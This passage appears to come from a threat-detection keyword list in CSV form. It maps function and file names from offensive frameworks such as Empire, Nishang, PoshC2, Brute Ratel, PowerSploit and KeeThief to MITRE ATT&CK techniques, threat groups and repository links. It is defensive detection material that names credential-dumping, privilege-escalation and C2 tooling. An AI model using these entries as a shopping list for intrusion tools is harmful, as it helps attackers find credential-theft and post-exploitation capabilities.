Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketNTLMSSPAuth*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketNTLMSSPNegotiate*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketRPCBind*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketRPCRequest*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketSMB*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PassHashes*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Get-PassHints*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*get-passnotexp*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get-password-policy.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Get-PEBasicInfo*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PEHeader.ps1*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*getPositionImplant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*getprivs.bin*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary 
Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*getprivs.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*get-process *amsi.dll*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-RBCD-Threaded*,offensive_tool_keyword,Get-RBCD-Threaded,Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments,T1558 - T1208 - T1550 - T1484 - T1486,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/FatRodzianko/Get-RBCD-Threaded,1,1,N/A,N/A,2,115,19,2021-08-10T23:29:48Z,2019-12-21T00:08:28Z -*Get-RegistryAlwaysInstallElevated*,offensive_tool_keyword,empire,Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-RegistryAlwaysInstallElevated*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-RegistryAutoLogon*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-RegistryAutoLogon*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*GetRektBoy724/SharpUnhooker*,offensive_tool_keyword,SharpUnhooker,C# Based Universal API Unhooker,T1055.012 - T1070.004 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GetRektBoy724/SharpUnhooker,1,1,N/A,9,4,365,103,2022-02-18T13:11:11Z,2021-05-17T01:33:38Z -*Get-RemoteCachedCredential*,offensive_tool_keyword,AD exploitation cheat sheet,Get cached credentials (if any),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-RemoteCachedCredential*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - 
T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z
-*Get-RemoteDesktopUserSessionList*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Get-RemoteDesktopUserSessionList.*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Get-RemoteLocalAccountHash*,offensive_tool_keyword,AD exploitation cheat sheet,Get local account hashes,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Get-RemoteLocalAccountHash*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z
-*Get-RemoteMachineAccountHash*,offensive_tool_keyword,AD exploitation cheat sheet,Get machine account hash for silver ticket attack,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*getremoteprocesslisting*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*Get-RickAstley*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-RickAstley.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-RickAstley.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*gets4uticket.py*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z
-*Get-SccmCacheFolder*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*get-screenshot*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*get-screenshotallwindows*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
